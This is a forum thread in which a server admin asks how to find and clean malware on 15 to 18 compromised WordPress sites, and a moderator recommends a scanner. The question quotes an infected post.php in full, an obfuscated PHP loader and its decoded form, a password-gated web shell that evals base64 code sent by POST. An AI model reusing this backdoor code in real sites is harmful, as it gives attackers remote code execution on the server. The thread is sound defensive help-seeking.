Clean some infected Wordpress sites

Discussion in 'HOWTO-Related Questions' started by mehargags, Aug 6, 2016.

  1. mehargags

    mehargags New Member

    Hi,
    I just made a new Debian 8 server to host some 15-16 WordPress sites... most of them had been compromised. I've updated the core/theme/plugins to the latest and cleaned some base64 files that I found.


    the infected post.php has
    Code:
    <?php
      $kAD4g2="\x70\x72".chr(101)."g_\x72e".chr(112)."\x6Ca".chr(99)."\x65";$qnVf5O=chr(101)."v\x61l".chr(40).chr(98)."a\x73\x65\x36\x34_\x64ec".chr(111)."\x64e\x28".chr(34)."\x51\x47".chr(86).chr(121).chr(99).chr(109)."\x39\x79".chr(88).chr(51).chr(74)."\x6c\x63".chr(71)."\x39\x79\x64G\x6C".chr(117)."Z".chr(121)."g\x77K\x54".chr(115).chr(75)."Q".chr(71)."l\x75a".chr(86)."\x39\x7aZX\x51\x6f".chr(73).chr(109).chr(82)."p".chr(99).chr(51)."\x42sY\x58\x6C\x66Z\x58J".chr(121)."b".chr(51)."\x4A\x7AI\x69".chr(119).chr(119)."K".chr(84)."\x73".chr(75).chr(81)."G".chr(108)."\x75".chr(97)."V".chr(57)."\x7A\x5A".chr(88).chr(81)."oI\x6dx".chr(118).chr(90).chr(49).chr(57)."lc\x6EJ".chr(118)."\x63nM\x69L".chr(68).chr(65)."p\x4F\x77\x70".chr(65)."\x61\x575".chr(112).chr(88)."\x33".chr(78)."l\x64\x43\x67\x69\x5A".chr(88).chr(74)."\x79".chr(98)."\x33\x4A\x66".chr(98).chr(71).chr(57)."n\x49".chr(105)."w\x77\x4bT\x73".chr(75)."C".chr(109)."lm\x49\x43\x68\x70c\x33".chr(78)."l\x64".chr(67).chr(103)."\x6b\x581".chr(66)."\x50".chr(85)."1".chr(81)."\x70\x49".chr(67)."Y\x6d".chr(73)."\x47l".chr(122).chr(88)."2F\x79\x63".chr(109)."F5\x4b\x43".chr(82).chr(102)."\x55\x45\x39T\x56".chr(67)."k".chr(103)."J".chr(105)."Y".chr(103)."\x592\x39".chr(49).chr(98)."\x6eQo\x4A\x46".chr(57).chr(81)."T1".chr(78)."\x55".chr(75)."T".chr(52).chr(120).chr(75)."\x51p".chr(55)."\x43\x67".chr(108)."mb".chr(51)."\x4A".chr(108)."\x59".chr(87)."\x4E\x6F".chr(73)."Cg".chr(107)."\x58\x31BP\x55".chr(49)."Q".chr(103).chr(89).chr(88)."M".chr(103)."\x4aHZ".chr(104)."\x63\x69".chr(107).chr(75)."\x43\x58s".chr(75)."\x43Q\x6C\x70".chr(90)."i".chr(65).chr(111)."I".chr(87)."\x6C".chr(122)."\x63\x32".chr(86)."\x30\x4B\x43\x52\x6ab\x32Rl\x4bS\x6b".chr(103).chr(74).chr(71)."\x4EvZ".chr(71)."\x55g\x50".chr(83).chr(65)."k".chr(100)."m\x46\x79O\x77\x6F\x4a\x43".chr(87)."\x56".chr(115)."\x63\x32\x56p\x5ai".chr(65).chr(111)."\x49".chr(87).chr(108)."z".chr(99).chr(50)."V0".chr(75).chr(67)."\x52w\x59\x58N".chr(122)."\x4bS\x6b\x67".chr(74
)."H".chr(66)."\x68c\x33\x4Dg\x50S".chr(65)."k\x64m\x46y\x4F\x77o\x4AC\x57".chr(86).chr(115)."c\x32\x55".chr(103).chr(89)."\x6e\x4A\x6CY\x57\x73\x37".chr(67)."g".chr(108)."9".chr(67).chr(103)."o".chr(74).chr(97)."W\x59".chr(103)."\x4b".chr(67)."Rw\x59XNzID".chr(48)."\x39\x49CJ".chr(52)."cz\x4e".chr(73).chr(81)."\x56".chr(78)."\x75\x64\x55\x4a".chr(119)."\x63H".chr(99).chr(53)."\x64F\x52m\x53U".chr(49)."K\x4DW\x4A\x61Zz\x4a\x34".chr(81)."n\x4a".chr(121)."\x52".chr(108).chr(70)."\x6C\x57\x43\x49".chr(112)."C".chr(103)."l\x37Cg\x6B\x4AZ".chr(88)."Z\x68".chr(98)."\x43".chr(104)."\x69\x59\x58N".chr(108)."Nj\x52f".chr(90)."\x47".chr(86).chr(106)."\x62\x32".chr(82)."lKC".chr(82)."\x6ab2R\x6cK".chr(83)."\x6B7\x43".chr(103)."l9\x43\x6e0".chr(75)."Z".chr(88).chr(104)."pd\x44\x73".chr(61)."\x22".chr(41).")\x3b";$Qa7Ug="/".chr(100)."\x64b\x376d\x62".chr(53)."\x33".chr(51)."81".chr(100)."\x61d\x39\x38\x33".chr(100)."\x35\x64\x33\x319".chr(100)."\x38d".chr(101)."\x65\x66".chr(97)."6".chr(47)."\x65";$kAD4g2($Qa7Ug,$qnVf5O,"d\x64b\x37".chr(54).chr(100)."\x62".chr(53)."\x3338\x31d\x61\x649".chr(56).chr(51).chr(100)."\x35".chr(100)."\x3319".chr(100)."\x38\x64\x65\x65\x66".chr(97)."\x36");
    ?>
    <?php @error_reporting(0);
    @ini_set("display_errors", 0);
    @ini_set("log_errors", 0);
    @ini_set("error_log", 0);
    if (isset($_POST) && is_array($_POST) && count($_POST) > 1) {
      foreach ($_POST as $var) {
      if (!isset($code)) $code = $var;
      elseif (!isset($pass)) $pass = $var;
      else break;
      }
      if ($pass == "xs3HASnuBppw9tTfIMJ1bZg2xBrrFQeX") {
      eval(base64_decode($code));
      }
    }
    exit;
    

    Which unPHP.net decodes to
    PHP:
    <?php @error_reporting(0);
    @ini_set("display_errors", 0);
    @ini_set("log_errors", 0);
    @ini_set("error_log", 0);
    if (isset($_POST) && is_array($_POST) && count($_POST) > 1) {
        foreach ($_POST as $var) {
            if (!isset($code)) $code = $var;
            elseif (!isset($pass)) $pass = $var;
            else break;
        }
        if ($pass == "xs3HASnuBppw9tTfIMJ1bZg2xBrrFQeX") {
            eval(base64_decode($code));
        }
    }
    exit;

    However, in less than 10 hrs the Exim mail queue shoots to above 20,000, which suggests there are still some malicious scripts lying deep under.
    Interestingly, on one of the sites... I was not able to log in with my admin user/pass at wp-admin. Suspecting infection, I reinstalled the WP core, theme and plugins (all latest from their respective web sources) without copying a single file from the backup dumps. I only imported the database.
    After 2 days, I was again not able to log in to wp-admin. Funny, I can't log in using Firefox but Chrome incognito lets me in.
    Don't know if that's something to do with infections or not.

    I installed Sucuri as well as Anti-Malware Security and Brute-Force Firewall plugins to scan one of the WP sites and it gives me a bunch of random files that sometimes have the base64 codes, but sometimes are clean. Scanning all 17-18 sites manually would be a pain... but will do if there isn't any better wholesome approach.

    Can you give me some good pointers where to start with a system-wide scan and detection of malicious files?
    1. Use Maldet?
    2. ClamScan?
    3. Any other scanner that can deep scan the filesystem and suggest the mischievous files?
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    You should scan the whole website tree with ISPProtect https://ispprotect.com/. There is a free trial available that you can download and use without registration.
     
